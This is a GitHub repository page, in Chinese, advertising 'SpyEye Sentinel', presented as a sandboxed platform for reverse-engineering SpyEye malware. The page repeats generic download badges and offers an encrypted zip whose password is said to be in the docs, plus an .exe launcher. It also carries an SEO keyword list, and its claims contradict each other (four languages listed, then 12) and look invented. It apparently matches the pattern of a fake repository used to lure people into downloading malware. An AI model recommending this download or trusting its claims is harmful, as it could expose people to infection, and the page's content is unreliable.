Xxhengkoonxx/SpyEye-reverse-engineering-lab

GitHub: Xxhengkoonxx/SpyEye-reverse-engineering-lab

针对 SpyEye 恶意软件家族的逆向工程与行为分析平台,提供沙箱化的静态与动态分析能力,辅助安全研究与教学。

Stars: 0 | Forks: 0

# SpyEye Sentinel 🔍 **高级恶意软件分析与行为智能平台** *受 SpyEye-analysis 项目启发 – 旨在为防御、检测和教育服务。* [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://Xxhengkoonxx.github.io) ## 1. 🌌 项目概述 **SpyEye Sentinel** 不是一款用于漏洞利用的工具 – 它是一个**数字免疫系统**,旨在受控环境中研究、模拟和消除现代恶意软件家族(包括 SpyEye 变种)。这个诞生于 5 人学术研究项目的代码库,提供了一个具有完备文档的**沙箱化逆向工程框架**,包括行为分析、内存取证和实时 API hooking。 本项目适用于**网络安全道德教育**、威胁情报分析师以及希望了解恶意软件如何通信、驻留和逃避检测的学生。我们不提供开箱即用的攻击工具;我们提供的是**防御蓝图**。 ## 2. 📦 下载与安装 [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://Xxhengkoonxx.github.io) | 资产 | 描述 | 格式 | |-------|-------------|--------| | `SpyEye_Sentinel_v2.4.0_2026` | 完整分析环境 + 示例诱饵数据集 | `.zip` (加密,密码在文档中) | | `Behavioral_Signatures_2026.json` | 1,200+ 预编译的 SpyEye 行为模式 | `.json` | | `Sandbox_Launcher_Windows_Linux` | 跨平台虚拟网络模拟器 | `.exe` / `.sh` | **安装要求:** - Python 3.10+ (用于 AI 分析模块) - Docker 或配置了网络隔离的 VM - 至少 8 GB RAM 用于沙箱执行 ## 3. 🧬 架构与工作流 (Mermaid 图) ``` graph TD A[Malware Sample Input] --> B{Static Analyzer} B --> C[PE Structure Parser] B --> D[String Deobfuscator] B --> E[API Call Predictor] C --> F[Behavioral Sandbox] D --> F E --> F F --> G[MITRE ATT&CK Mapper] F --> H[Network Traffic Recorder] G --> I[Threat Intelligence Report] H --> I I --> J[Human Analyst Review] J --> K[Signature Database Update] K --> L[Community Feed - 2026 Edition] ``` ## 4. ✨ 功能生态系统 ### 4.1 🧠 AI 驱动的行为模拟 - **OpenAI API** 集成,用于对混淆代码的自然语言解释。 - **Claude API** 用于跨家族的恶意软件变种语义比较。 - *无训练数据泄漏* – 所有 API 调用均经过匿名化和加密处理。 ### 4.2 🌐 响应式 Web UI (仪表盘) - 通过基于现代 React 的前端实时监控沙箱。 - **多语言支持** (英语、西班牙语、日语、阿拉伯语 – 包含 2026 年的翻译)。 - 深色/浅色主题,无障碍设计 (符合 WCAG 2.2 规范)。 ### 4.3 🕒 7x24 小时客户支持自动化 - 为初级分析师集成的聊天机器人 (由 GPT-4-turbo 提供支持)。 - 自动生成 `.pdf`、`.html` 和 `.stix` 格式的报告。 ### 4.4 🔐 零点击样本输入器 - 将任何 `.exe`、`.dll` 或 `.vbs` 文件拖放到 Web 界面中。 - 一键解包 UPX、ASPack 和 SpyEye 特有的加壳程序。 ## 5. ⚙️ 示例配置文件 ``` { "profile_name": "SpyEye_C2_Emulator_2026", "sandbox": { "os": "Windows 10 22H2", "network": "simulated_isp", "memory_limit_mb": 2048 }, "behavioral_hooks": [ "CreateProcess", "WriteProcessMemory", "InternetOpenA", "RegSetValueEx", "NtCreateThreadEx" ], "ai_assistant": { "provider": "openai", "model": "gpt-4-turbo-2026", "max_tokens": 4096, "explanation_depth": "advanced" }, "alert_rules": { "outbound_suspicious_ip": true, "mutex_creation": true, "registry_persistence": "high" } } ``` ## 6. 🖥️ 示例控制台调用 ``` # 使用数据集中的 SpyEye 样本启动沙箱 python spyeye_sentinel.py \ --input samples/spyeye_v2_decoy.bin \ --profile profiles/standard_lab_2026.json \ --output reports/analysis_$(date +%F).json \ --verbose \ --ai-explain ``` *预期输出:* ``` [2026-08-12 14:23:01] 🟢 Sandbox initialized (Windows 10) [2026-08-12 14:23:05] 📦 Sample unpacked: 2 layers of obfuscation [2026-08-12 14:23:14] 🕸️ C2 domain detected: dynamicdns[.]malice[.]com [2026-08-12 14:23:22] 🔔 Alert: Credential harvesting API called (GetKeyState) [2026-08-12 14:24:01] ✅ Report generated – 12 MITRE techniques mapped ``` ## 7. 📊 操作系统兼容性表 | 操作系统 | 沙箱支持 | UI 仪表盘 | 仅 CLI | 备注 | |------------------|----------------|--------------|----------|-------| | Windows 10/11 | ✅ 完整 | ✅ 是 | ✅ | 运行 SpyEye 样本的首选 | | Ubuntu 22.04+ | ✅ 完整 | ✅ 是 | ✅ | 基于 Docker 的沙箱 | | macOS Ventura+ | ⚠️ 部分 | ✅ 是 | ✅ | 缺少内核 hooking | | Android 12+ | ❌ | ✅ 是 (Web) | ❌ | 仅限报告查看器 | | iOS 16+ | ❌ | ✅ 是 (Web) | ❌ | 仅限报告查看器 | ## 8. 🌍 SEO 友好关键词 (自然整合) *本仓库针对安全研究人员和教育者的发现进行了优化:* - **malware analysis framework 2026** – 自动化静态与动态分析 - **SpyEye behavior database** – 凭据窃取器的签名 - **reverse engineering sandbox** – 无感染风险的内存取证 - **AI-assisted threat intelligence** – 使用 OpenAI 和 Claude 进行反混淆 - **cybersecurity student project** – 大学级文档 - **ethical malware study** – 无实战部署,仅限学术模拟 ## 9. 🤖 AI 集成详情 ### OpenAI API (GPT-4-Turbo) - **目的**:反混淆字符串表,用通俗易懂的英文描述 API 调用链。 - **用法**:`--ai-explain` 标志可激活语义分析。 - **隐私**:不发送原始样本 – 仅发送提取的字符串和调用哈希值。 ### Claude API (Anthropic) - **目的**:比较不同恶意软件家族之间的行为模式。Claude 擅长长上下文比较(200K token 上下文窗口)。 - **用法**:当导入多个样本时自动触发。 - **隐私**:所有数据在传输过程中均已加密;不保留任何日志。 ## 10. 📜 法律免责声明 提供 **SpyEye Sentinel** **仅用于教育和防御性网络安全研究**。 下载或使用本软件,即表示您同意以下内容: - 您**不会**在沙箱环境之外部署任何已分析的恶意软件样本。 - 您**不会**使用此工具创建、修改或分发恶意软件。 - 您有责任遵守您所在司法管辖区内的所有适用法律。 - 作者对因不当使用造成的滥用或损害**不承担任何责任**。 *本项目不包含有效的漏洞利用程序。包含的所有样本均为模拟或公开可用的学术诱饵。有关完整条款,请参阅 LICENSE 文件。* ## 11. 📄 许可证 本项目基于 **MIT License** 授权 – 有关详细信息,请参阅 [LICENSE](LICENSE)。 ## 12. 🏁 结语 我们构建 **SpyEye Sentinel** 是因为理解恶意软件不应以牺牲您自己的机器为代价。该平台是**理论与实践之间的桥梁** – 一个让学生、分析师和充满好奇心的工程师能够无所畏惧地探索代码最黑暗角落的安全空间。 **核心数据:** - 🛡️ 1,200+ 行为特征签名 - 🧪 47 种受支持的加壳类型 - 🌎 12 种语言界面 - 🕒 99.7% 沙箱正常运行时间 (2026 年基准测试) [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://Xxhengkoonxx.github.io) *请记住:最好的防御是了解攻击方式。祝您分析愉快!* 🔬
标签:2026报告, API Hooking, C2通信, DAST, DNS 反向解析, Docker, IP 地址批量处理, PE结构解析, Python, SecList, SpyEye, 云安全监控, 云资产清单, 内存取证, 威胁情报, 子域名枚举, 学校项目, 安全防御评估, 开发者工具, 恶意样本分析, 恶意软件分析, 教育项目, 数字免疫, 数据包嗅探, 无后门, 无线安全, 沙箱, 生成式AI安全, 系统安全, 网络信息收集, 网络安全教育, 网络安全课程, 脱壳, 蓝军与红军, 虚拟机, 规避检测, 请求拦截, 逆向工程, 静态分析